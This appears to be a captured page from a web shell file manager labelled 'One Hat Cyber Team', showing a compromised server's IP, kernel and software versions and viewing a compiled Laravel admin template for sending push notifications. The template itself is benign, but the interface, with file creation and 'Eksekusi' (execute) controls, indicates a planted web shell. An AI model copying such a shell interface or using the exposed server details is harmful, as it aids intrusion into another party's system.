⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
public_html
/
storage
/
framework
/
views
/
View File Name :
c94189954cd55cad3141f9b45a5d8b728bbe92fd.php
<?php if(Session::has('admin_lang')): ?> <?php $admin_lang = Session::get('admin_lang'); $cd = str_replace('admin_', '', $admin_lang); $default = \App\Models\Language::where('code', $cd)->first(); ?> <?php else: ?> <?php $default = \App\Models\Language::where('is_default', 1)->first(); ?> <?php endif; ?> <?php $__env->startSection('content'); ?> <div class="page-header"> <h4 class="page-title"><?php echo e(__('Send Notification')); ?></h4> <ul class="breadcrumbs"> <li class="nav-home"> <a href="<?php echo e(route('admin.dashboard') . '?language=' . $default->code); ?>"> <i class="flaticon-home"></i> </a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e(__('Push Notification')); ?></a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e(__('Send Notification')); ?></a> </li> </ul> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <form class="" action="<?php echo e(route('admin.pushnotification.push')); ?>" method="post"> <?php echo csrf_field(); ?> <div class="card-header"> <div class="card-title"><?php echo e(__('Send Notification')); ?></div> </div> <div class="card-body"> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="form-group"> <label for=""><?php echo e(__('Title')); ?> **</label> <input type="text" class="form-control" name="title" value="" placeholder="<?php echo e(__('Enter title of Notification')); ?>"> <?php if($errors->has('title')): ?> <p class="text-danger mb-0"><?php echo e($errors->first('title')); ?></p> <?php endif; ?> </div> <div class="form-group"> <label for=""><?php echo e(__('Message')); ?></label> <textarea name="message" class="form-control" rows="3"></textarea> </div> <div class="form-group"> <label for=""><?php echo e(__('Button Text')); ?> **</label> <input type="text" class="form-control" name="button_text" value="" placeholder="<?php echo e(__('Enter Button Text')); ?>"> <?php if($errors->has('button_text')): ?> <p class="text-danger mb-0"><?php echo e($errors->first('button_text')); ?></p> <?php endif; ?> </div> <div class="form-group"> <label for=""><?php echo e(__('Button URL')); ?> **</label> <input type="text" class="form-control" name="button_url" value="" placeholder="<?php echo e(__('Enter Button URL')); ?>"> <?php if($errors->has('button_url')): ?> <p class="text-danger mb-0"><?php echo e($errors->first('button_url')); ?></p> <?php endif; ?> <p class="mb-0 text-warning"> <?php echo e(__('Only those users will receive push notification, who have allowed it')); ?>. </p> <p class="text-warning mb-0"> <?php echo e(__("Push notification won't work for 'http', it needs 'https'")); ?></p> </div> </div> </div> </div> <div class="card-footer text-center"> <button type="submit" class="btn btn-success"> <span class="btn-label"> <i class="fa fa-check"></i> </span> <?php echo e(__('Send')); ?> </button> </div> </form> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('admin.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/id/public_html/resources/views/admin/pushnotification/send.blade.php ENDPATH**/ ?>